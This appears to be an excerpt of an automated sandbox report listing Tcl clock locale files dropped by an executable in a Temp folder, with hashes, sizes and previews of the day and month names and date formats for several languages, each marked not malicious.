                                                                                                                                                                                                                                                    SHA-512:EA77EFF9B23A02F59526499615C08F1314A91AB41561856ED7DF45930FDD8EC11A105218890FD012045C4CC40621C226F94BDC3BEB62B83EA8FAA7AEC20516E7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fr DAYS_OF_WEEK_ABBREV [list \. "dim."\. "lun."\. "mar."\. "mer."\. "jeu."\. "ven."\. "sam."]. ::msgcat::mcset fr DAYS_OF_WEEK_FULL [list \. "dimanche"\. "lundi"\. "mardi"\. "mercredi"\. "jeudi"\. "vendredi"\. "samedi"]. ::msgcat::mcset fr MONTHS_ABBREV [list \. "janv."\. "f\u00e9vr."\. "mars"\. "avr."\. "mai"\. "juin"\. "juil."\. "ao\u00fbt"\. "sept."\. "oct."\. "nov."\. "d\u00e9c."\. ""]. ::msgcat::mcset fr MONTHS_FULL [list \. "janvier"\. "f\u00e9vrier"\. "mars"\. "avril"\. "mai"\. "juin"\. "juillet"\. "ao\u00fbt"\. "septembre"\. "octobre"\. "novembre"\. "d\u00e9cembre"\. ""]. ::msgcat::mcset fr BCE "a
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):279
                                                                                                                                                                                                                                                    Entropy (8bit):4.863262857917797
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmoXqH5oIX3vG5oIX3v6X5og+3vnFDoAov:4EnLzu81qHd3v63v6Y3v9dy
                                                                                                                                                                                                                                                    MD5:483652B6A3D8010C3CDB6CAD0AD95E72
                                                                                                                                                                                                                                                    SHA1:8FCDB01D0729E9F1A0CAC56F79EDB79A37734AF5
                                                                                                                                                                                                                                                    SHA-256:980E703DFB1EEDE7DE48C958F6B501ED4251F69CB0FBCE0FCA85555F5ACF134A
                                                                                                                                                                                                                                                    SHA-512:0282B8F3884BB4406F69AF2D2F44E431FB8077FEA86D09ED5607BC0932A049853D0C5CAF0B57EF0289F42A8265F76CC4B10111A28B1E0E9BD54E9319B25D8DB6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fr_BE DATE_FORMAT "%d/%m/%y". ::msgcat::mcset fr_BE TIME_FORMAT "%T". ::msgcat::mcset fr_BE TIME_FORMAT_12 "%T". ::msgcat::mcset fr_BE DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):279
                                                                                                                                                                                                                                                    Entropy (8bit):4.843031408533295
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmooI9jo13vG5o13v6X5o1+3vnFDoAov:4EnLzu8eI9Q3vB3v613v9dy
                                                                                                                                                                                                                                                    MD5:017D816D73DAB852546169F3EC2D16F2
                                                                                                                                                                                                                                                    SHA1:3145BB54D9E1E4D9166186D5B43F411CE0250594
                                                                                                                                                                                                                                                    SHA-256:F16E212D5D1F6E83A9FC4E56874E4C7B8F1947EE882610A73199480319EFA529
                                                                                                                                                                                                                                                    SHA-512:4D4EF395B15F750F16EC64162BE8AB4B082C6CD1877CA63D5EA4A5E940A7F98E46D792115FD105B293DC43714E8662BC4411E14E93F09769A064622E52EDE258
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fr_CA DATE_FORMAT "%Y-%m-%d". ::msgcat::mcset fr_CA TIME_FORMAT "%T". ::msgcat::mcset fr_CA TIME_FORMAT_12 "%T". ::msgcat::mcset fr_CA DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):281
                                                                                                                                                                                                                                                    Entropy (8bit):4.866549204705568
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmoFt2poF+3vG5oF+3v6X5o++3vnFDoAov:4EnLzu8btn+3vB+3v6+3v9dy
                                                                                                                                                                                                                                                    MD5:8B27EFF0D45F536852E7A819500B7F93
                                                                                                                                                                                                                                                    SHA1:CAED7D4334BAD8BE586A1AEEE270FB6913A03512
                                                                                                                                                                                                                                                    SHA-256:AB160BFDEB5C3ADF071E01C78312A81EE4223BBF5470AB880972BBF5965291F3
                                                                                                                                                                                                                                                    SHA-512:52DD94F524C1D9AB13F5933265691E8C44B2946F507DE30D789FDCFEA7839A4076CB55A01CEB49194134D7BC84E4F490341AAB9DFB75BB960B03829D6550872B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fr_CH DATE_FORMAT "%d. %m. %y". ::msgcat::mcset fr_CH TIME_FORMAT "%T". ::msgcat::mcset fr_CH TIME_FORMAT_12 "%T". ::msgcat::mcset fr_CH DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1141
                                                                                                                                                                                                                                                    Entropy (8bit):4.24180563443443
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ga DAYS_OF_WEEK_ABBREV [list \. "Domh"\. "Luan"\. "M\u00e1irt"\. "C\u00e9ad"\. "D\u00e9ar"\. "Aoine"\. "Sath"]. ::msgcat::mcset ga DAYS_OF_WEEK_FULL [list \. "D\u00e9 Domhnaigh"\. "D\u00e9 Luain"\. "D\u00e9 M\u00e1irt"\. "D\u00e9 C\u00e9adaoin"\. "D\u00e9ardaoin"\. "D\u00e9 hAoine"\. "D\u00e9 Sathairn"]. ::msgcat::mcset ga MONTHS_ABBREV [list \. "Ean"\. "Feabh"\. "M\u00e1rta"\. "Aib"\. "Beal"\. "Meith"\. "I\u00fail"\. "L\u00fan"\. "MF\u00f3mh"\. "DF\u00f3mh"\. "Samh"\. "Noll"\. ""]. ::msgcat::mcset ga MONTHS_FULL [list \. "Ean\u00e1ir"\. "Feabhra"\. "M\u00e1rta"\. "Aibre\u00e1n"\. "M\u00ed na Bealtaine"\. "Meith"\. "I\u00fail"\. "L\u00fanasa"
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):279
                                                                                                                                                                                                                                                    Entropy (8bit):4.7755422576113595
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ga_IE DATE_FORMAT "%d.%m.%y". ::msgcat::mcset ga_IE TIME_FORMAT "%T". ::msgcat::mcset ga_IE TIME_FORMAT_12 "%T". ::msgcat::mcset ga_IE DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):950
                                                                                                                                                                                                                                                    Entropy (8bit):4.037076523160125
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset gl DAYS_OF_WEEK_ABBREV [list \. "Dom"\. "Lun"\. "Mar"\. "M\u00e9r"\. "Xov"\. "Ven"\. "S\u00e1b"]. ::msgcat::mcset gl DAYS_OF_WEEK_FULL [list \. "Domingo"\. "Luns"\. "Martes"\. "M\u00e9rcores"\. "Xoves"\. "Venres"\. "S\u00e1bado"]. ::msgcat::mcset gl MONTHS_ABBREV [list \. "Xan"\. "Feb"\. "Mar"\. "Abr"\. "Mai"\. "Xu\u00f1"\. "Xul"\. "Ago"\. "Set"\. "Out"\. "Nov"\. "Dec"\. ""]. ::msgcat::mcset gl MONTHS_FULL [list \. "Xaneiro"\. "Febreiro"\. "Marzo"\. "Abril"\. "Maio"\. "Xu\u00f1o"\. "Xullo"\. "Agosto"\. "Setembro"\. "Outubro"\. "Novembro"\. "Decembro"\. ""].}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.839318757139709
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset gl_ES DATE_FORMAT "%d %B %Y". ::msgcat::mcset gl_ES TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset gl_ES DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1037
                                                                                                                                                                                                                                                    Entropy (8bit):4.13549698574103
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset gv DAYS_OF_WEEK_ABBREV [list \. "Jed"\. "Jel"\. "Jem"\. "Jerc"\. "Jerd"\. "Jeh"\. "Jes"]. ::msgcat::mcset gv DAYS_OF_WEEK_FULL [list \. "Jedoonee"\. "Jelhein"\. "Jemayrt"\. "Jercean"\. "Jerdein"\. "Jeheiney"\. "Jesarn"]. ::msgcat::mcset gv MONTHS_ABBREV [list \. "J-guer"\. "T-arree"\. "Mayrnt"\. "Avrril"\. "Boaldyn"\. "M-souree"\. "J-souree"\. "Luanistyn"\. "M-fouyir"\. "J-fouyir"\. "M.Houney"\. "M.Nollick"\. ""]. ::msgcat::mcset gv MONTHS_FULL [list \. "Jerrey-geuree"\. "Toshiaght-arree"\. "Mayrnt"\. "Averil"\. "Boaldyn"\. "Mean-souree"\. "Jerrey-souree"\. "Luanistyn"\. "Mean-fouyir"\. "Jerrey-fouyir"\. "Mee Houney"\.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.890913756172577
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset gv_GB DATE_FORMAT "%d %B %Y". ::msgcat::mcset gv_GB TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset gv_GB DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1938
                                                                                                                                                                                                                                                    Entropy (8bit):4.234997703698801
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset he DAYS_OF_WEEK_ABBREV [list \. "\u05d0"\. "\u05d1"\. "\u05d2"\. "\u05d3"\. "\u05d4"\. "\u05d5"\. "\u05e9"]. ::msgcat::mcset he DAYS_OF_WEEK_FULL [list \. "\u05d9\u05d5\u05dd \u05e8\u05d0\u05e9\u05d5\u05df"\. "\u05d9\u05d5\u05dd \u05e9\u05e0\u05d9"\. "\u05d9\u05d5\u05dd \u05e9\u05dc\u05d9\u05e9\u05d9"\. "\u05d9\u05d5\u05dd \u05e8\u05d1\u05d9\u05e2\u05d9"\. "\u05d9\u05d5\u05dd \u05d7\u05de\u05d9\u05e9\u05d9"\. "\u05d9\u05d5\u05dd \u05e9\u05d9\u05e9\u05d9"\. "\u05e9\u05d1\u05ea"]. ::msgcat::mcset he MONTHS_ABBREV [list \. "\u05d9\u05e0\u05d5"\. "\u05e4\u05d1\u05e8"\. "\u05de\u05e8\u05e5"\. "\u05d0\u05e4\u05e8"\. "\u05de\u05d0\u05d9"\. "\u05d9\u05d5\u05e0"\. "\u05d9\u05d5\u05dc"\. "\u05d0\u05d5\u05d2"\. "\u05e1\u05e4\u05d8"\.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1738
                                                                                                                                                                                                                                                    Entropy (8bit):4.1505681803025185
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8dVYe48VcOVcz1HtDVcqiVca4mGE18VcRBkEVcRfVcRMsVcqiVca4mGE18VI:465v4bNVO7GQbBkDuM4O7GQbBkDuh3x
                                                                                                                                                                                                                                                    MD5:349823390798DF68270E4DB46C3CA863
                                                                                                                                                                                                                                                    SHA1:814F9506FCD8B592C22A47023E73457C469B2F53
                                                                                                                                                                                                                                                    SHA-256:FAFE65DB09BDCB863742FDA8705BCD1C31B59E0DD8A3B347EA6DEC2596CEE0E9
                                                                                                                                                                                                                                                    SHA-512:4D12213EA9A3EAD6828E21D3B5B73931DC922EBE8FD2373E3A3E106DF1784E0BCE2C9D1FBEAE0D433449BE6D28A0F2F50F49AB8C208E69D413C6787ADF52915E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset hi DAYS_OF_WEEK_FULL [list \. "\u0930\u0935\u093f\u0935\u093e\u0930"\. "\u0938\u094b\u092e\u0935\u093e\u0930"\. "\u092e\u0902\u0917\u0932\u0935\u093e\u0930"\. "\u092c\u0941\u0927\u0935\u093e\u0930"\. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\. "\u0936\u0928\u093f\u0935\u093e\u0930"]. ::msgcat::mcset hi MONTHS_ABBREV [list \. "\u091c\u0928\u0935\u0930\u0940"\. "\u092b\u093c\u0930\u0935\u0930\u0940"\. "\u092e\u093e\u0930\u094d\u091a"\. "\u0905\u092a\u094d\u0930\u0947\u0932"\. "\u092e\u0908"\. "\u091c\u0942\u0928"\. "\u091c\u0941\u0932\u093e\u0908"\. "\u0905\u0917\u0938\u094d\u0924"\. "\u0938\u093f\u0924\u092e\u094d\u092c\u0930"\. "\u0905\u0915\u094d\u091f\u0942\u092c\u0930"\. "\u0928\u0935\u092e\u094d\u092c\u093
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.882853646266983
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmocv+9/Loz3v6rZoco+3v+6f6HK:4EnLzu8+vWq3v6rpF3vmq
                                                                                                                                                                                                                                                    MD5:BC86C58492BCB8828489B871D2A727F0
                                                                                                                                                                                                                                                    SHA1:22EEC74FC011063071A40C3860AE8EF38D898582
                                                                                                                                                                                                                                                    SHA-256:29C7CA358FFFCAF94753C7CC2F63B58386234B75552FA3272C2E36F253770C3F
                                                                                                                                                                                                                                                    SHA-512:ABFE093952144A285F7A86800F5933F7242CB224D917B4BAA4FD2CA48792BEFCBEE9AB7073472510B53D31083719EC68A77DD896410B3DC3C6E2CCD60C2E92F9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset hi_IN DATE_FORMAT "%d %M %Y". ::msgcat::mcset hi_IN TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset hi_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1121
                                                                                                                                                                                                                                                    Entropy (8bit):4.291836444825864
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu84VBVgqoLpYDThoLZDT25KNWg1gqNvEKvOAl:46nNYPSLZP2ZVqJTO+
                                                                                                                                                                                                                                                    MD5:46FD3DF765F366C60B91FA0C4DE147DE
                                                                                                                                                                                                                                                    SHA1:5E006D1ACA7BBDAC9B8A65EFB26FAFC03C6E9FDE
                                                                                                                                                                                                                                                    SHA-256:9E14D8F7F54BE953983F198C8D59F38842C5F73419A5E81BE6460B3623E7307A
                                                                                                                                                                                                                                                    SHA-512:3AC26C55FB514D9EA46EF57582A2E0B64822E90C889F4B83A62EE255744FEBE0A012079DD764E0F6C7338B3580421C5B6C8575E0B85632015E3689CF58D9EB77
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset hr DAYS_OF_WEEK_ABBREV [list \. "ned"\. "pon"\. "uto"\. "sri"\. "\u010det"\. "pet"\. "sub"]. ::msgcat::mcset hr DAYS_OF_WEEK_FULL [list \. "nedjelja"\. "ponedjeljak"\. "utorak"\. "srijeda"\. "\u010detvrtak"\. "petak"\. "subota"]. ::msgcat::mcset hr MONTHS_ABBREV [list \. "sij"\. "vel"\. "o\u017eu"\. "tra"\. "svi"\. "lip"\. "srp"\. "kol"\. "ruj"\. "lis"\. "stu"\. "pro"\. ""]. ::msgcat::mcset hr MONTHS_FULL [list \. "sije\u010danj"\. "velja\u010da"\. "o\u017eujak"\. "travanj"\. "svibanj"\. "lipanj"\. "srpanj"\. "kolovoz"\. "rujan"\. "listopad"\. "studeni"\. "prosinac"\. ""]. ::msgcat::mcset hr DATE_FORMAT "
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1327
                                                                                                                                                                                                                                                    Entropy (8bit):4.447184847972284
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8Xjv5ZemNruwcVNtZHTE9wocxPvt9vq:46fBZemNqwIZHTEE3t5q
                                                                                                                                                                                                                                                    MD5:0561E62941F6ED8965DFC4E2B424E028
                                                                                                                                                                                                                                                    SHA1:C622B21C0DBA83F943FBD10C746E5FABE20235B2
                                                                                                                                                                                                                                                    SHA-256:314F4180C05DE4A4860F65AF6460900FFF77F12C08EDD728F68CA0065126B9AE
                                                                                                                                                                                                                                                    SHA-512:CAD01C963145463612BBAE4B9F5C80B83B228C0181C2500CE8CE1394E1A32CCA3587221F1406F6343029059F5AD47E8FD5514535DCEA45BBA6B2AE76993DFFBD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset hu DAYS_OF_WEEK_ABBREV [list \. "V"\. "H"\. "K"\. "Sze"\. "Cs"\. "P"\. "Szo"]. ::msgcat::mcset hu DAYS_OF_WEEK_FULL [list \. "vas\u00e1rnap"\. "h\u00e9tf\u0151"\. "kedd"\. "szerda"\. "cs\u00fct\u00f6rt\u00f6k"\. "p\u00e9ntek"\. "szombat"]. ::msgcat::mcset hu MONTHS_ABBREV [list \. "jan."\. "febr."\. "m\u00e1rc."\. "\u00e1pr."\. "m\u00e1j."\. "j\u00fan."\. "j\u00fal."\. "aug."\. "szept."\. "okt."\. "nov."\. "dec."\. ""]. ::msgcat::mcset hu MONTHS_FULL [list \. "janu\u00e1r"\. "febru\u00e1r"\. "m\u00e1rcius"\. "\u00e1prilis"\. "m\u00e1jus"\. "j\u00fanius"\. "j\u00falius"\. "augusztus"\. "szeptember"\. "okt\u00f3ber"\. "nove
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                                                                                    Entropy (8bit):3.9322448438499125
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8acGEXctI9tdb/7579g6tdhUgQbVg:46GBEXKI9tdHtdwg
                                                                                                                                                                                                                                                    MD5:CE834C7E0C3170B733122FF8BF38C28D
                                                                                                                                                                                                                                                    SHA1:693ACC2A0972156B984106AFD07911AF14C4F19C
                                                                                                                                                                                                                                                    SHA-256:1F1B0F5DEDE0263BD81773A78E98AF551F36361ACCB315B618C8AE70A5FE781E
                                                                                                                                                                                                                                                    SHA-512:23BFC6E2CDB7BA75AAC3AA75869DF4A235E4526E8E83D73551B3BC2CE89F3675EBFA75BC94177F2C2BD6AC58C1B125BE65F8489BC4F85FA701415DB9768F7A80
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset id DAYS_OF_WEEK_ABBREV [list \. "Min"\. "Sen"\. "Sel"\. "Rab"\. "Kam"\. "Jum"\. "Sab"]. ::msgcat::mcset id DAYS_OF_WEEK_FULL [list \. "Minggu"\. "Senin"\. "Selasa"\. "Rabu"\. "Kamis"\. "Jumat"\. "Sabtu"]. ::msgcat::mcset id MONTHS_ABBREV [list \. "Jan"\. "Peb"\. "Mar"\. "Apr"\. "Mei"\. "Jun"\. "Jul"\. "Agu"\. "Sep"\. "Okt"\. "Nov"\. "Des"\. ""]. ::msgcat::mcset id MONTHS_FULL [list \. "Januari"\. "Pebruari"\. "Maret"\. "April"\. "Mei"\. "Juni"\. "Juli"\. "Agustus"\. "September"\. "Oktober"\. "November"\. "Desember"\. ""].}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.857986813915644
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmo0kGvNLo0F/W3v6aZo0kT+3vR6HK:4EnLzu8NGvNS3v6aQK3voq
                                                                                                                                                                                                                                                    MD5:A285817AAABD5203706D5F2A34158C03
                                                                                                                                                                                                                                                    SHA1:18FD0178051581C9F019604499BF91B16712CC91
                                                                                                                                                                                                                                                    SHA-256:DB81643BA1FD115E9D547943A889A56DFC0C81B63F21B1EDC1955C6884C1B2F5
                                                                                                                                                                                                                                                    SHA-512:0B6C684F2E5122681309A6212980C95C14172723F12D4864AF8A8A913DC7081BC42AC39CF087D29770B4A1F0B3B1F712856CBF05D1975FFFC008C16A91081A00
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset id_ID DATE_FORMAT "%d %B %Y". ::msgcat::mcset id_ID TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset id_ID DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1255
                                                                                                                                                                                                                                                    Entropy (8bit):4.391152464169964
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8qVXVDWpXMVmDz1ZVcWVzbQ1/xZ9b3eYXvhv3eT3:462hVW5JDz1ZVUbpfV83
                                                                                                                                                                                                                                                    MD5:6695839F1C4D2A92552CB1647FD14DA5
                                                                                                                                                                                                                                                    SHA1:04CB1976846A78EA9593CB3706C9D61173CE030C
                                                                                                                                                                                                                                                    SHA-256:6767115FFF2DA05F49A28BAD78853FAC6FC716186B985474D6D30764E1727C40
                                                                                                                                                                                                                                                    SHA-512:208766038A6A1D748F4CB2660F059AD355A5439EA6D8326F4F410B2DFBBDEECB55D4CE230C01C519B08CAB1CF5E5B3AC61E7BA86020A7BDA1AFEA624F3828521
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset is DAYS_OF_WEEK_ABBREV [list \. "sun."\. "m\u00e1n."\. "\u00feri."\. "mi\u00f0."\. "fim."\. "f\u00f6s."\. "lau."]. ::msgcat::mcset is DAYS_OF_WEEK_FULL [list \. "sunnudagur"\. "m\u00e1nudagur"\. "\u00feri\u00f0judagur"\. "mi\u00f0vikudagur"\. "fimmtudagur"\. "f\u00f6studagur"\. "laugardagur"]. ::msgcat::mcset is MONTHS_ABBREV [list \. "jan."\. "feb."\. "mar."\. "apr."\. "ma\u00ed"\. "j\u00fan."\. "j\u00fal."\. "\u00e1g\u00fa."\. "sep."\. "okt."\. "n\u00f3v."\. "des."\. ""]. ::msgcat::mcset is MONTHS_FULL [list \. "jan\u00faar"\. "febr\u00faar"\. "mars"\. "apr\u00edl"\. "ma\u00ed"\. "j\u00fan\u00ed"\. "j\u00fal\u00ed"\. "\u00e1g\u00fast"\.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1240
                                                                                                                                                                                                                                                    Entropy (8bit):4.207511774275323
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
